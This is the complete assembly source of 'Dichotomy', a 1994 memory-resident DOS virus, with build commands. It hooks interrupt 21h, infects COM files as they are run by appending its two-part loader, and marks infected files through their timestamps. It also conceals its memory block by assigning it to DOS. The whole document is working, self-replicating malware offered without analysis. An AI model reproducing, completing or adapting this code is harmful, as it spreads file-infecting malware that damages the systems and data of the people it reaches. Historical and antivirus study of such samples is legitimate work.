;       Dichotomy Virus
;       (c) 1994 Evil Avatar
;
; TASM /M3 DIKOTOMY
; TLINK /X DIKOTOMY
; EXE2BIN DIKOTOMY DIKOTOMY.COM

.model tiny
.code
org 0

;=====( Entry point for COM files )========================================

Dichotomy:
          call delta
delta:    mov bx, sp
          mov bp, word ptr ds:[bx]
          sub bp, offset delta          ;get delta offset
          inc sp
          inc sp
          cmp word ptr ds:[bp+virus1], 'D['
          mov ah, 1ah
          lea dx, [bp+newDTA]           ;buffer for new DTA
          int 21h                       ;set new disk transfer address
          mov ah, 4eh
          mov cx, 7                     ;any attribute
          lea dx, [bp+FileName]         ;host name
          int 21h                       ;find second host file
          jc maybe_host                 ;if carry, then we need a new host
          mov ax, 3d00h
          int 21h                       ;open second host
          xchg ax, bx                   ;handle is better in bx
          mov ax, 4200h
          sub cx, cx
          mov dx, word ptr ds:[bp+newDTA+1ah]
          sub dx, (offset heap-offset loader2)
          int 21h                       ;move pointer to virus code
          mov ah, 3fh
          mov cx, (offset heap-offset loader2)
          lea dx, [bp+loader2]
          int 21h                       ;read in second part of virus
          mov ah, 3eh
          int 21h                       ;close the file
maybe_host:
          mov ah, 51h
          int 21h                       ;check if resident
          inc bx                        ;if resident, PSP should be -1
          jz resident                   ;yes? kewl!
          cmp word ptr ds:[bp+virus1], 'D['     ;check if we are fully here
          je go_res                     ;yes? we need to go resident
return:   mov ah, 1ah
          mov dx, 80h
          int 21h                       ;restore DTA
          lea si, [bp+comfix]           ;offset of first 3 bytes of file
          mov di, 100h                  ;start of .com file
          mov ax, di
          push ax
          movsw
          movsb
          retn
resident: cmp word ptr ds:[bp+virus1], 'D['     ;is the second host here?
          je return                     ;yes? return to program
          mov ah, 62h
          int 21h                       ;request new host
          jmp return                    ;return to host
go_res:   jmp loader2                   ;go memory resident

;=====( Variables )========================================================

comfix    db 0cdh, 20h, 0               ;first 3 bytes of .com file
virus     db '[Dichotomy]', 0           ;virus name
author    db '(c) 1994 Evil Avatar', 0  ;me
FileName  db 'DIKOTOMY.COM', 0, 73h dup (?)     ;second host name
loader1_end:

;=====( Go memory resident )===============================================

loader2:
          mov byte ptr ds:[bp+count], 0 ;infections = 0
          mov ah, 'E'
          xor ah, 0fh
          mov bx, -1
          int 21h                       ;get available memory
          mov ah, 'A'
          xor ah, 0bh
          sub bx, (virus_end-Dichotomy+15)/16+1
          int 21h                       ;create a hole in memory
          mov ax, 3521h
          int 21h                       ;get int 21h handler
          mov word ptr [bp+save21], bx
          mov word ptr [bp+save21+2], es        ;save int 21h vector
          mov ah, 'E'
          xor ah, 0dh
          mov bx, (virus_end-Dichotomy+15)/16
          int 21h                       ;allocate the memory
          mov es, ax                    ;es is high virus segment
          mov cx, (virus_end-Dichotomy+1)/2
          lea si, [bp+Dichotomy]
          sub di, di
          rep movsw                     ;copy ourself up there
          push es
          pop ds                        ;save virus seg for int 21h change
          dec ax                        ;MCB segment
          mov es, ax
          mov word ptr es:[1], 8        ;make DOS the owner of our segment
          mov ax, 4541h
          sub ax, 2020h
          lea dx, [int21]
          int 21h                       ;set new int 21h handler
          push cs cs
          pop ds es                     ;restore PSP segments
          jmp return                    ;return to host

;=====( Find a new host )==================================================

request:  push ds di si cx cs
          pop ds                        ;save registers
          mov di, bp                    ;set up scan registers
          sub si, si
          mov cx, 5
          repe cmpsw                    ;scan to see if it is us
          jne restore1                  ;no? let dos take care of it
          mov ax, 4300h
          lea dx, [WhatRun]
          int 21h                       ;get attributes of file
          push cx                       ;save them
          mov ax, 4301h
          sub cx, cx
          int 21h                       ;clear attributes
          mov ax, 3d02h
          int 21h                       ;open file read/write
          xchg ax, bx
          mov ax, 5700h
          int 21h                       ;get file date/time
          and cx, 1fh                   ;get seconds
          cmp cx, 1fh                   ;is it 62?
          je cant_fix                   ;can't fix this file
          mov ax, 4202h
          sub cx, cx
          cwd
          int 21h                       ;go to end of file
          mov ah, 40h
          mov cx, (heap-loader2)
          lea dx, [loader2]
          int 21h                       ;copy to end of file
          mov ax, 5700h
          int 21h                       ;get file date/time
          or cx, 1fh
          mov ax, 5701h
          int 21h
cant_fix: mov ax, 4301h
          pop cx                        ;get attributes
          int 21h                       ;restore attributes
          mov ah, 3eh
          int 21h                       ;close file
restore1: pop cx si di ds               ;restore registers
          jmp dos21                     ;go to dos

;=====( Interrupt 21h handler )============================================

int21:    inc ah
          cmp ah, 4ch                   ;execute file
          je infect                     ;infect it
          dec ah
          cmp ah, 51h                   ;install check
          je install_check
          cmp ah, 62h                   ;request for new host
          je _request
dos21:    jmp dword ptr cs:[save21]     ;call dos
_request: jmp request

;=====( Installation check )===============================================

install_check:
          push di si cx ds cs
          pop ds                        ;save registers
          mov di, bp                    ;set up scan registers
          sub si, si
          mov cx, 5
          repe cmpsw                    ;scan to see if it is us
          jne restore                   ;no? let dos take care of it
          mov bx, -1                    ;return code
          pop ds                        ;restore ds
          add sp, 6                     ;fix stack
          iret                          ;return
restore:  pop cx si di ds               ;restore registers
          jmp dos21                     ;go to dos

;=====( Infection routine )================================================

infect:   dec ah
          call push_all                 ;save registers
          push cs
          pop es                        ;es equals code segment
          mov si, dx
          lea di, [WhatRun]
          mov cx, 40h
          rep movsw                     ;save filename in buffer
          mov si, dx                    ;ds:si equals file name
          lea di, [FileName]
          mov ax, 4300h
          int 21h                       ;get attributes of file
          push cx                       ;save them
          mov ax, 4301h
          sub cx, cx
          int 21h                       ;clear attributes
          mov ax, 3d02h
          int 21h                       ;open file read/write
          xchg ax, bx                   ;put handle in bx
          mov ax, 5700h
          int 21h                       ;get file time/date
          and cx, 1fh                   ;get seconds
          cmp cx, 1eh                   ;is 60 or 62?
          jae already_inf               ;then already infected
          lodsb                         ;get drive letter
          dec si                        ;point to filename again
          and al, 5fh                   ;make it uppercase
          cmp al, 'C'                   ;is it C or higher?
          jb _single                    ;no? we must fully infect it
          cmp byte ptr cs:[count], 1    ;have we already done loader 2?
          jne do_loader2                ;yes? start doing loader 1s
do_loader1:
          call inf_loader1
          jmp done_inf
do_loader2:          
          call inf_loader2
          jmp done_inf
_single:  push si di
          mov cx, 40h
          rep movsw                     ;save filename in buffer
          pop di si
          call inf_loader1
          call inf_loader2
          mov byte ptr cs:[count], 0
done_inf: mov ah, 3eh
          int 21h                       ;close file
already_inf:
          mov ax, 4301h
          pop cx                        ;get attributes
          int 21h                       ;restore attributes
          call pop_all                  ;restore registers
          jmp dos21                     ;call dos

;=====( Infect file with loader 1 )========================================

inf_loader1:
          push si di ds dx cs           ;save filename and other stuff
          pop ds
          mov byte ptr ds:[count], 0    ;do loader 2 from now on
          mov ah, 3fh
          mov cx, 3
          lea dx, [comfix]
          int 21h                       ;read in first 3 bytes
          mov ax, 4202h
          sub cx, cx
          cwd
          int 21h                       ;go to end of file
          or dx, dx
          jnz bad_file
          cmp ax, 65024-(virus_end-Dichotomy)   ;see if file is too big
          jae bad_file
          mov cx, word ptr ds:[comfix]
          cmp cx, 'M'+'Z'
          jz bad_file                   ;can't infect .exe's
          sub ax, 3                     ;calculate jump
          mov word ptr ds:[buffer], ax  ;set up jump
          mov ah, 40h
          mov cx, (loader1_end-Dichotomy)
          cwd
          int 21h                       ;copy virus to end of file
          mov ax, 4200h
          sub cx, cx
          cwd
          int 21h                       ;go to beginning of file
          mov ah, 40h
          mov cx, 3
          lea dx, [buffer-1]
          int 21h                       ;copy jump to beginning
          mov ax, 5700h
          int 21h                       ;get file time/date
          mov ax, 5701h
          or cx, 1eh
          and cx, 0fffeh                ;set to 60 seconds
          int 21h                       ;set new file time
bad_file: pop dx ds di si
          retn

;=====( Infect file with loader 2 )========================================

inf_loader2:
          push ds dx                    ;save file name
          mov cx, 40h
          rep movsw                     ;save filename in buffer
          push cs
          pop ds                        ;ds needs to be code segment
          mov byte ptr ds:[count], 1    ;do loader 1 from now on
          mov ax, 4202h
          sub cx, cx
          cwd
          int 21h                       ;go to end of file
          mov ah, 40h
          mov cx, (heap-loader2)
          lea dx, [loader2]
          int 21h                       ;copy to end of file
          mov ax, 5700h
          int 21h                       ;get file date/time
          or cx, 1fh                    ;set to 62 seconds
          mov ax, 5701h
          int 21h                       ;set new file time
          pop dx ds                     ;restore file name
          retn                          ;return to caller

;=====( Push all registers )===============================================

push_all: pop word ptr cs:[p_all]       ;save return code
          push ax bx cx dx bp si di ds es       ;save registers
          pushf                         ;save flags
          jmp word ptr cs:[p_all]       ;return to caller

;=====( Pop all registers )================================================

pop_all:  pop word ptr cs:[p_all]       ;save return code
          popf                          ;restore flags
          pop es ds di si bp dx cx bx ax        ;restore registers
          jmp word ptr cs:[p_all]       ;return to caller

;=====( More variables )===================================================

virus1    db '[Dichotomy]', 0           ;virus signature
          db 0e9h                       ;jump cs:xxxx
heap:
buffer    dw ?                          ;jump buffer
newDTA    db 2bh dup (?)                ;replacement disk transfer address
save21    dd ?                          ;interrupt 21h vector
p_all     dw ?                          ;push/pop return value
count     db ?                          ;infection count
WhatRun   db 80h dup (?)
virus_end:
end Dichotomy